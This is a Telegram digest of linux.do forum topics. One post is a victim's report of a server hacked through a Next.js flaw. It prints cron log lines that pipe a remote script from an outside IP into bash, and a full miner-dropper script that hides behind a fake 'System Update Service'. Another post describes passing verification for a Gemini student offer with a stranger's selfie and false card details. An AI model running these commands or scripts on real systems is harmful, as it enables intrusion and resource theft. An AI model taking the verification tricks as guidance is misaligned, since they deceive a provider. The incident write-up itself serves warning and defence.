linux.do
21K subscribers
115K photos
195 videos
115 files
247K links
linux.do最新话题和热议话题
Download Telegram
让鬼话连篇重回流量巅峰

自从 道士塌方后,没有故事看了,总觉得少了点什么。所以,我想整个系列之作,让鬼话连篇重回流量巅峰。
今天 就和大家分享一下
道家十不传,八不收

道法十不传

一、不忠不孝之人、不仁不义者不传
二、执迷不误、言语轻狂、自以为是者不传
三、不尊师重道,诽谤道者不传
四、不敬师,不遵规守法者不传
五、心存邪念、贪财轻命、图谋不轨之人不传
六、见色心动好淫乐娼者不传
七、无诚心诚信,与道无缘之人不传
八、不守秘密揭人隐私或泄露天机及道法者不传
九、心怀私念,不懂舍得之道,想不劳而获之人不传
十、仇恨心重、怒火攻心、脾气反常者不传

收徒八规

1、心不信,不信大道,好奇游戏,为徒虚名者不收。
2、心不逆,忤孝背义,悖负亲长,叛辱家国者不收。
3、心不正,只求神通,搬符弄咒,妄求神鬼者不收。
4、心不纯,好求名利,蛊惑众生,以术恣欲者不收。
5、心不善,不怜弱苦,害伤人物,行恶为非者不收。
6、心不定,轻浮狂妄,不待传承,持窃道法者不收。
7、心不坚,不耐苦行,学而不修,虚耗光阴者不收。
8、心不固,学道不专,好参外道,三心二意者不收。

8 posts - 8 participants

Read full topic

via LINUX DO - 最新话题 (author: 送牛奶的)
住院期间如何获得水煮蛋?

家人刚做完手术,医生要求每天吃一个鸡蛋,但是这个医院好像没有便利店之类的地方卖水煮蛋 🫠
医生说每天吃什么都订好了,固定的,但是也不知道具体有什么,不知道具体有没有鸡蛋

本来想的是买一个半导体冰箱+煮蛋器,每天这么煮一个,但是不知道病房里能不能允许放这些东西

坐标上海复旦大学附属华山医院

5 posts - 5 participants

Read full topic

via LINUX DO - 最新话题 (author: 一只羊蝎子)
有没有提供gpt-realtime大模型的站点

有项目需要用到实时语音对话,请问佬友有没有提供gpt-realtime大模型的站点,求推荐!!!

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: LeeXieXie)
可恶的资本主义,但是有点羡慕是怎么回事

感动常在

27 posts - 26 participants

Read full topic

via LINUX DO - 热门话题 (author: 爱心喵)

Invalid media:
image
image
Cursor的这个模型名称我真的绷不住了

我就想知道还能怎么叠
iPhone 17 PlusProMaxUltraElite是吧
22 posts - 19 participants

Read full topic

via LINUX DO - 热门话题 (author: WANGXIANRU)

Invalid media: image
【长期】推荐一些我喜欢的播客

小宇宙小组件每日播客推荐继续讨论,该帖为记录小宇宙组件的每日编辑推荐,新开本帖以区分我本人的推荐。

本帖创建于2025年12月09日,将长期更新一些我喜欢的播客,有时间是我会在每个回复中记录一些我的收获,如果你有喜欢的播客,也欢迎推荐,但希望至少写一个句话介绍一下你推荐的原因😉

注意,佬友们不要再在本帖下面推荐播客频道了,聚焦具体的某一期播客,最好介绍一下你为什么喜欢这一期(哪怕一句话也好)。

11 posts - 9 participants

Read full topic

via LINUX DO - 热门话题 (author: 木瓜蛋白酶Tea🎋)
【警示】我的服务器因为最近的 nextjs 漏洞被黑了

省流:我的服务器被黑客利用最近的next漏洞做成了矿机

我在服务器部署了一个nextjs服务,就我们几个人的小工作室用的工具,没有用docker,是偷懒直接用宝塔部署的,前几天也看到了 nextjs 的漏洞,我以为我这没公开(实际已经挂上域名部署在公网了),没事,就懒得升级了。
结果今天小伙伴问我怎么网站就不去了,我一进网站一看,好家伙,cpu和内存直接给我拉满了:

于是请教 gemini 给我支支招,调查得到以下结果:
grep "CRON" /var/log/syslog

Dec 7 21:40:01 lavm-9sukhghlhp CRON[2275256]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 7 21:41:01 lavm-9sukhghlhp CRON[2275338]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 7 21:42:01 lavm-9sukhghlhp CRON[2275394]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
......
Dec 8 04:07:01 lavm-9sukhghlhp CRON[2310051]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 8 04:08:01 lavm-9sukhghlhp CRON[2310114]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
Dec 8 04:09:01 lavm-9sukhghlhp CRON[2310150]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>&1)
......

发现从 7 号就开始执行他的恶意脚本了,可惜那个链接现在连不上了
cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDAkjHqyK8n/ZYliklt0BRy4aVHAlCm2PQSWBWyhM9AL root@lavm-9sukhghlhp

发现对方留下的免密登录公钥
/www/wwwroot/finance-workflow-nextjs# ls
app data kal.tar.gz next-env.d.ts payload.so public xmrig-6.24.0
components eslint.config.mjs lib node_modules pnpm-lock.yaml sex.sh
components.json next.config.ts package.json postcss.config.mjs tsconfig.json

发现项目目录中的恶意程序:payload.so, sex.sh, kal.tar.gz, xmrig-6.24.0

sex.sh 的代码为:
#!/bin/bash

# Configuration
TAR_FILE="kal.tar.gz"
EXTRACT_DIR="xmrig-6.24.0"
BINARY_PATH="$(pwd)/$EXTRACT_DIR/xmrig"
ARGS="--url pool.hashvault.pro:443 --user 88tGYBwhWNzGesQs5QkwE1PdBa1tXGb9dcjxrdwujU3SEs3i7psaoJc4KmrDvv4VPTNtXazDWGkvGGfqurdBggvPEhZ43DJ --pass next --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
SERVICE_NAME="system-update-service"

# Download and setup if not already present
if [ ! -f "$BINARY_PATH" ]; then
curl -L -o "$TAR_FILE" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
tar xvzf "$TAR_FILE"
fi

chmod +x "$BINARY_PATH"

# Attempt systemd setup
INSTALLED_SYSTEMD=0
if [ "$(id -u)" -eq 0 ] && command -v systemctl >/dev/null 2>&1; then
echo "Root privileges detected. Attempting systemd setup..."

SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"

cat <<EOF > "$SERVICE_FILE"
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=${BINARY_PATH} ${ARGS}
Restart=always
RestartSec=10
User=root

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable "$SERVICE_NAME"
systemctl start "$SERVICE_NAME"

if systemctl is-active --quiet "$SERVICE_NAME"; then
echo "Service started via systemd."
INSTALLED_SYSTEMD=1
fi
fi

# Fallback to nohup
if [ $INSTALLED_SYSTEMD -eq 0 ]; then
echo "Starting with nohup..."
nohup "$BINARY_PATH" $ARGS >/dev/null 2>&1 &
fi

以下是 gemini 的分析:

好在数据都还在,没给我库给删了,唉这次是吸取教训了,也是给佬们一个警示吧

我之前真以为即使放到公网上,只要不在网上泄漏自己的域名什么的就没啥事,结果我一看数据,74 个 IP 访问过,实际使用这个站点的就3个人。。。惊了,明白过来真的有脚本能扫描到的

30 posts - 21 participants

Read full topic

via LINUX DO - 热门话题 (author: 雾海藏月)

Invalid media:
image
image
image
image
image
不是甲骨文来真的啊,我也开出来了!!!!

从这个帖子来

卧槽卧槽我甲骨文也终于有了!! 搞七捻三
同样是看到佬友的这个帖子 于是自己也尝试了一下,终于拥有人生第一只龟了!! 方法一模一样 美国地址 ,美国代理,gmail,fiat24的卡,gv 还有这个 [2025-12-09_140148]

我日我日我日,一年了,看着各位佬开我无动于衷,今天心血来潮开了一下
chrome浏览器,无代理,电信家宽,建行visas卡,真实地址姓名电话,日本东京!!!!
顺便说一下这次我没有复制任何信息,纯手打的,祝各位佬冲破龟壳!

坏消息开不出arm 4h24g 目前升级处于abc状态 只能老实开一台amd 1c2g的机子了

123 posts - 64 participants

Read full topic

via LINUX DO - 热门话题 (author: 比特)

Invalid media:
image
image
【已领完】刚知道一直都可以升lv2.。升级了,给各位佬发50个红包

感谢社区。。很久没有混论坛的感觉了,早年自己discuz做论坛。前段时间刚因数据库没续费十几年的站没了=。= 现在新的论坛也玩不太会,总之给大家发小红包庆祝一下 总额100 有50枚红包。在l站也学了好多知识,喜欢这个站,信息量很大,感谢各位大佬分享,作为一个标准的老落伍者也算是找到精神家园了。
zfb红包🐴 61621247
40 posts - 38 participants

Read full topic

via LINUX DO - 热门话题 (author: 知了)
求助佬友SMMS账户被删了可以恢复么,或者有啥更好的存储方案

前几天使用站里的 Z-image 生成了几张图,放在自己的 obsidian 笔记了,但是没有意识到已经设置好图片是直接上传到 smms 的,结果账户被删了,不知道能不能恢复,但是现在几千条笔记已经报废了,有些心累。想问问佬友们有没有什么合适的方案。

大致的想的比较好的方案是这样子的,本地通过 obsidian(文字笔记自动 git 备份。图片太多就图床了)、alist 或者 picgo 一次上传图片,云端自动存储多份,至少双备份,每天会检查 1000 张图片是否有效,没有效就自动重新通过其他有效的连接进行恢复,可以使现有的程序,也可以是自己开发编写代码,可以使用 Cloudflare R2 + 自己域名 + PicGo 上传 +(可选)Lsky Pro 管理后台这种方案。

这个是 AI 弄的一个方案,正在尝试着手搭建看看,不知道可行性如何,如有更好的建议,欢迎各位佬友拍砖。

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: kkkw)
我们家孩子和我说,他的快乐最重要,钱不重要

在和孩子(4 岁半)聊到某个话题时(具体话题我忘了),孩子和我说,他的快乐最重要,钱不重要 🤣

16 posts - 15 participants

Read full topic

via LINUX DO - 最新话题 (author: duoer)
社保局的人突然过来查人是怎么个景?

乐,突然上门让提供证明一个员工是我们公司的员工 🤣

3 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: bayun)
你怎么直接扔治疗药水啊,手册里面不是这么写的

bilibili.com

催眠APP启动!_哔哩哔哩_bilibili

-, 视频播放量 2287518、弹幕量 382、点赞数 193258、投硬币枚数 3354、收藏人数 23671、转发人数 4834, 视频作者 ENX叉叉酱, 作者简介 某宝搜:ENX叉叉酱的小店 ...

:distorted_face:
Minecraft不是这样的
5 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: stevessr backup)

Invalid media:
image
image
image
书接上回,距离AI的地方是输入法

大家好,我基于rime开发了一款ai原生的输入法,想寻求一些建议! 开发调优
[image][image][image][image] (回答错误与否是模型能力问题) tab键联想,command键是句子级别补全,第二次command是调用大模型(多为问句和祈使句格式) 现在的问题在于 在不改变用户原本输入习惯性增加一个AI辅助功能是否可行?用户是否会接受? 我不懂双拼五笔之类的方案,用全拼打一整句话不使用数字键上屏是否是未来输入法的趋势? 本地模…

之前说的基于rime-squirrel开发的ai原生输入法现已开源
仓库地址:GitHub - a1594834522-coder/squirrel-ai: Rime-AI for macOS
目前仅支持macos用户
核心功能:1基于上下文的语句联想,2快如闪电的ai调用(无需打开浏览器或任何应用!)
安装包内已包含输入法本体+雾凇词库集成,开箱即用,配置简单。

本项目完全沿用rime的开源协议,目前的实现逻辑非常简单,有任何好的想法欢迎贡献!
Just for fun

4 posts - 4 participants

Read full topic

via LINUX DO - 最新话题 (author: Abruzz1)

Invalid media:
image
image
IDEA2025.3更新后遇到的奇怪问题

今天更新后从右侧maven工具点击使用任何命令,最后都提示这个编码,手动在终端运行又是正常的,请问这个是要怎么解决

2 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: irisuare)

Invalid media: image
佬们,老是脖子酸,背疼怎么解决

看一段时间屏幕,脖子到背后就很累。转头都有卡顿滞留感,有什么好办法解决

24 posts - 15 participants

Read full topic

via LINUX DO - 最新话题 (author: HollowKnight)

Invalid media: image
收一个Gemini学生会员账号,支持Antigravity

14 posts - 7 participants

Read full topic

via LINUX DO - 最新话题 (author: 北城)
r2dbc 好像没什么人用啊

🫠 搞个分页都如此复杂,
又不想在代码里面拼接sql

3 posts - 2 participants

Read full topic

via LINUX DO - 最新话题 (author: lhDream)
用flclash不如clash顺滑怎么回事?

有部分链接导入之前一直用的clash不显示,最近下了个FLclash,但我发现用起来卡卡的,换回clash就很顺滑,不知道各位佬友遇没遇到过这种情况?

4 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: XOne)
成功跟着佬友的教程领到了gemini学生优惠

卡的问题算是最复杂的,折腾了一会闲鱼找了一个 8 元的虚拟卡成功开了。
电脑上绑卡要账单地址试了几次失败了,显示 “输入的资料无效”,手机上绑定银行卡只要商家给的卡号,日期,安全码,姓名和邮编,后两项应该可以随便填,我找了个免税区的邮编直接填的。
年龄验证和 ip 纯净决定了能不能通过学生认证后继续申请,我一直用的宝可梦美节点,时好时坏有时候一个浏览器能打开,另一个浏览器显示不可用,还有两次是点完后转圈然后报错,有点难受的,不过最后是完成了。
如果设置好生日后有年龄验证要求可以网上随便找一张自拍就行,审核很松,我是手机配合电脑完成的。
绑卡也尝试了新加坡节点用银联卡但是失败了,换好节点后仍然失败,卡号位数就不同,所以到这一步放弃了,paypal 要美国手机号同样不如直接买虚拟卡。欢迎交流成功经验以及 gemini 用途

4 posts - 3 participants

Read full topic

via LINUX DO - 最新话题 (author: 运行在雪莲果)
求助:有google one但是没有反重力权限是为啥?

rt,之前是有的,用了一周突然授权失败了,期间换过ip,难不成是ip问题?

1 post - 1 participant

Read full topic

via LINUX DO - 最新话题 (author: write_ww)